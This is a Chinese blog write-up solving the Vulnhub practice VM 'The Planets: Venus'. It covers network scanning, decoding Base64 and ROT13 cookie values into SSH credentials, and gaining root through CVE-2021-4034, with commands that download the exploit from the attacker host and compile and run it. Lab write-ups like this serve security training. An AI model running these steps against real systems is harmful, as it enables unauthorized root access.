看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus

2023-10-27

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/theplanets/Venus.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.102

使用命令:nmap -sS -sV -A -n -p- 192.168.0.102

在这里插入图片描述

开启了808022端口访问8080,通过分析可以得出这是个Python的网页Django框这里有提示:可以使用guest账号登入密码一样。

在这里插入图片描述

登入成功后看到有个金星得图片,接着使用dirsearch 扫一下发现都重定向到 Django 管理登入界面

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

venusbase64加密然后 抓包生成得venus:thrfgirahf使用Rot13解密后得到密码也为venus
得到bWFnZWxsYW46aXJhaGZ2bmF0cmJ5YnRsMTk4OQ== base64解密后为magellan:irahfvnatrbybtl1989
在进行rot13解密得到:venusiangeology1989

最终得到账号密码为:magellan/venusiangeology1989 网页尝试无果,尝试SSH登入,登入成功!!!

②:SSH登入:

登入成功获取第一个FLAG。
在这里插入图片描述

③:CVE-2021-4034漏洞提权:

使用命令:find / -perm -u=s -type f 2>/dev/null 查看可以利用得权限

在这里插入图片描述
Mercury一样可以使用这个提权 这里就方便多了,靶机里面有unzip 不需要使用tar在进行打包解压了

cd /tmp
wget http://192.168.0.105/CVE-2021-4034-main.zip
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main/
make  
./cve-2021-4034

在这里插入图片描述

④:获取FLAG:

在这里插入图片描述

⑤:缓冲区溢出和提权:

这里我不会想学得可以参考:https://medium.com/@mcl0x90/the-planets-venus-vulnhub-write-up-f6727d08bafb

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度高,主要i是最后得提权吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息
2.替换Cookie值 进行解密 Base64Rot13解密
3.CVE-2021-4034漏洞得利用(漏洞很强大!)
4.缓冲区溢出提权(参考大佬wp 比较难 不太会)

在这里插入图片描述

The Planets系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus 的相关文章

  • DC-7靶机渗透测试

    文章目录 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 1 2 端口扫描 1 3 目录扫描 2 SSH远程登录 3 漏洞发现 4 漏洞利用 5 提权 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 netdiscover r
  • 记录渗透靶场实战【网络安全】

    第一次写靶场实战的文章 有不足之处还请多多指教 本次实战的靶场是红日安全vulnstack系列的第二个靶场 靶场地址 http vulnstack qiyuanxuetang net vuln detail 3 环境搭建 网络环境 网卡配置
  • 解决哥斯拉内存马 pagecontext 的问题

    零基础学黑客 搜索公众号 白帽子左一 前言 注入内存马借助当前的webshell工具而言 冰蝎可以通过创建hashmap放入request response session替换pagecontext来解决 HttpSession sessi
  • Hacking The Box----Awkward

    信息收集 nmap扫描 发现22号端口和80号端口打开 80号端口上运行着http服务器 访问ip后URL变为hat valley htb 修改 etc hosts文件 添加10 10 11 185 hat valley htb 然后就能正
  • 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1

    Vulnhub靶机FunBox1渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 暴力破解 ssh登入 提权 获取flag Vulnhub靶机渗透总结 Vulnhub
  • 渗透测试信息收集

    信息收集 渗透的本质是信息收集 信息收集分为主动信息收集和被动信息收集 主动信息收集能够收集到更多的信息 但是会产生痕迹 容易被溯源 被动信息收集是信息收集的第一步 通过第三方工具进行收集 不与主机直接交互 需要收集的信息包括 域名 子域名
  • sqlmap详细使用介绍

    SQLmap介绍 sqlmap是一个自动化的SQL注入工具 其主要功能是扫描 发现并利用给定的URL进行SQL注入 目前支持的数据库有MySql Oracle Access PostageSQL SQL Server IBM DB2 SQL
  • 渗透测试常用浏览器插件汇总

    1 shodan 这个插件可以自动探测当前网站所属的国家 城市 解析IP地址以及开放的服务和端口 包括但不限于FTP DNS SSH或者其他服务等 属被动信息搜集中的一种 2 hackbar 收费之后用Max Hackerbar代替 这个插
  • pikachu靶场记录之暴力破解-包括带token的密码猜解

    说明 pikachu是一个免费的php靶场 类似于dvwa 从github下载对应的项目 解压缩并放到phpstudy的www目录下即可 在phpstudy软件中开启apache mysql 访问首页 192 168 10 150 pika
  • redis未授权访问漏洞利用+redis日志分析

    redis未授权访问漏洞利用 redis日志分析 redis未授权访问 远程连接redis kali redis cli h IP redis常用语句 set key value 设置键值对 get key 获得值 incr intkey
  • Webshell工具的流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)

    0x00 前言 使用各种的shell工具获取到目标权限 即可进行数据操作 今天来简要分析一下目前常使用的各类shell管理工具的流量特诊 帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 payload特征 PHP ASP AS
  • DC-2靶机渗透测试

    1 信息收集 使用arp scan l扫描 扫描靶机开放端口 直接访问192 168 188 165发现无法访问被重定向到了 http dc 2 修改hosts文件 hosts文件是linux系统中负责ip地址与域名快速解析的文件 Linu
  • 文件上传之IIS6.0解析漏洞

    文章目录 1 判断iis版本 2 使用目录解析漏洞 2 1 写asp一句话木马 2 2 bp抓包 2 3 修改上传路径 2 4 实用工具连接 2 5 get shell 3 使用文件解析漏洞 3 1 写一句话马 3 2 上传 3 3 抓包改
  • 渗透测试——cookie注入

    1 cookie注入原理 Cookie最先是由Netscape 网景 公司提出的 Netscape官方文档中对Cookie的定义是这样的 Cookie是在HTTP协议下 服务器或脚本可以维护客户工作站上信息的一种方式 Cookie的用途非常
  • 墨者靶场—SQL手工注入漏洞测试(MySQL数据库)

    0x00 前言 学SQL注入也有一段时间了 找了一个在线靶场 这个题目基本上学会最基本的注入原理和方法都能拿下 废话就不多说了 直接来演示吧 菜鸟渗透 大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Ngi
  • 浅谈逻辑漏洞中的越权访问漏洞

    越权漏洞 越权访问漏洞示意图 一 越权访问漏洞简介 1 类型 水平越权 通过更换的某个ID之类的身份标识 从而使A账号获得 增删查改 B账号的数据 垂直越权 使用低权限身份的账号 发送高权限账号的请求 获得其高权限的操作 未授权访问 通过删
  • ctfshow-网络迷踪-初学再练( 一座雕像判断军事基地名称)

    ctf show 网络迷踪第4关 题目中只有一座雕像 需要根据雕像提交军事基地的名称 推荐使用谷歌识图 溯源到一篇博客 答案就在文章标题中 给了一座雕像 看样子不像是国内的风格 扔谷歌识图找找线索 访问谷歌识图 根据图片搜索 https w
  • 鸡肋的RDP反制

    更新时间 2023年07月19日09 18 29 为什么叫鸡肋 鸡肋者 食之无肉 弃之有味 你说不能成吧 但是有成功案例 你说成了吧 要求太高 还要看运气的 一句话 对方需要开启磁盘共享 不开启 没办法反制 1 背景介绍 在很多攻防中 蓝队
  • 『渗透测试基础』| 什么是渗透测试?有哪些常用方法?如何开展?测试工具有哪些?优势在哪里?

    渗透测试基础 什么是渗透测试 有哪些常用方法 如何开展 测试工具有哪些 优势在哪里 1 什么是渗透测试 2 有哪些常用方法 2 1 针对性测试 2 2 外部测试 2 3 内部测试 2 4 盲测 2 5 双盲测试
  • 运维人员必须知道的10个系统进程

    前言 在日常运维工作中 经常会看到一些奇怪的系统进程占用资源比较高 但是又不敢随意的Kill这些进程 而这些系统级的内核进程都是会用中括号括起来的 它们会执行一些系统的辅助功能 如将缓存写入磁盘 无括号的进程都是用户们执行的进程 如java

随机推荐

  • office全家桶_告别office“全家桶”,自定义选择组件安装,用户体验一级棒

    相信点进来看的朋友们对Office都不会陌生 在安装office的时候不知道大家有没有发现 就算是最便宜的一套 安装包里面除了Word Excel PowerPoint三兄弟之外 其中还还包含了Outlook Publisher Acces
  • 多行输入实现

    C while scanf d d a b 2 如果a和b都被成功读入 那么scanf的返回值就是2 如果只有a被成功读入 返回值为1 如果a和b都未被成功读入 返回值为0 如果遇到错误或遇到end of file 返回值为EOF 且返回值
  • 笔记——什么是鉴权

    前言 鉴权是自动化测试路上的拦路虎 故以此记录鉴权到底是怎么回事 一 什么是鉴权 为什么要鉴权 鉴权 是指验证用户是否有访问系统的权利 为什么要鉴权 对用户进行鉴权 防止非法用户占用网络资源 非法用户接入网络 被骗取关键信息 二 鉴权方式
  • SpringBoot使用Validator校验框架

    Hibernate Validator 简介 Hibernate Validator是Hibernate项目中的一个数据校验框架 是Bean Validation 的参考实现 Hibernate Validator除了提供了JSR 303规
  • QTabWidget 改变tabBar位置 并改变文字方向

    起因 QTabWidget默认的tabBar在最上端 改进 但有时需要将tabBar放置在左侧 但是设置后效果如下 最终 有时候需要如下效果 则需要自定义style 附相应代码 具体边框可通过stylesheet进行设置 include m
  • 有序链表转二叉树

  • git删除创建的项目

    一 在当前项目首页找到 setting选项 二 点击Setting gt Advanced settings gt Expand 三 翻到最后 找到Remove project 点击删除
  • Unity Pico XR开发之打包测试(二)

    之前说了有几个Demo场景 上一篇文章 传送门 就从 VR Examples 开始说起 1 Grab Interaction 抓取互动 演示如何用监听手柄输入事件抓取场景内的Box 2 Initial Tracking 头戴显示器设备跟踪
  • 使用百度定位无法初始化问题

    The location function has been stopped because you do not agree with the privacy compliance policy Please recheck the se
  • jQuery easyui创建组件的三种方式

    以创建layout布局为例子 一 通过html配合data options属性创建一个属性
  • 进制哈希(自然溢出)

    进制哈希 自然溢出 计算单个字符串哈希值 typedef unsigned long long ull ull strhash string s ull H 0 P 131 for char c s H H P c return H 计算字
  • 图像分割coil-20_Coil Kotlin Android的默认图像加载器

    图像分割coil 20 介绍 Introduction A well developed language has a number of supporting libraries that make the life of a devel
  • 3.Docker容器学习之基础简单使用

    文章目录 0x00 Docker进阶补充 0 镜像与容器 1 数据管理 2 高级网络配置 0x01 搭建私有仓库 0x02 Dockerfile基础学习 0x03 Docker Compose编排 1 安装与配置 2 命令一览 3 模板文件
  • 百度地图TILE算法

    Creating primary keyvar LLBAND2 75 60 45 30 15 0 var LL2MC2 0015702102444 111320 7020616939 0x60e374c3105a3 0x24bb4115e2
  • Java ArrayList Class

    In this tutorial we will learn about the Java ArrayList class We will learn about different ArrayList operations and met
  • (Jquery功能篇) jquery 插件fancybox查看图片原图

    效果截图 fancybox相关介绍 1 可以支持图片 html文本 flash动画 iframe以及ajax的支持 2 可以自定义播放器的CSS样式 3 可以以组的形式进行播放 4 如果将鼠标滚动插件 mouse wheel plugin
  • ubuntu中.conf 文件的修改与保存

    命令行下输入 sudo vim etc 文件名 conf 进入编辑模式 按 i 键进入编辑模式 此时可以修改文本 按 esc 键 此时退出修改文本 输入 wq 保存退出
  • 自动

    合约地址 https remix ethereum org 代码地址 https pst klgrth io paste ptwko raw 注意 50行代码token值替换成自己的钱包地址 最少要用 3 个BNB 不然是抢不到的 代码 p
  • WPF DataGrid控制DataGridTextColumn的IsReadOnly属性问题

    DataGridTextColumn这个控件不是一个真正的Visual所以IsReadOnly的属性绑定没用 如果绑定为
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus

    Vulnhub靶机The Planets Venus渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 SSH登入 CVE 2021 4034漏洞提权 获取FLAG 缓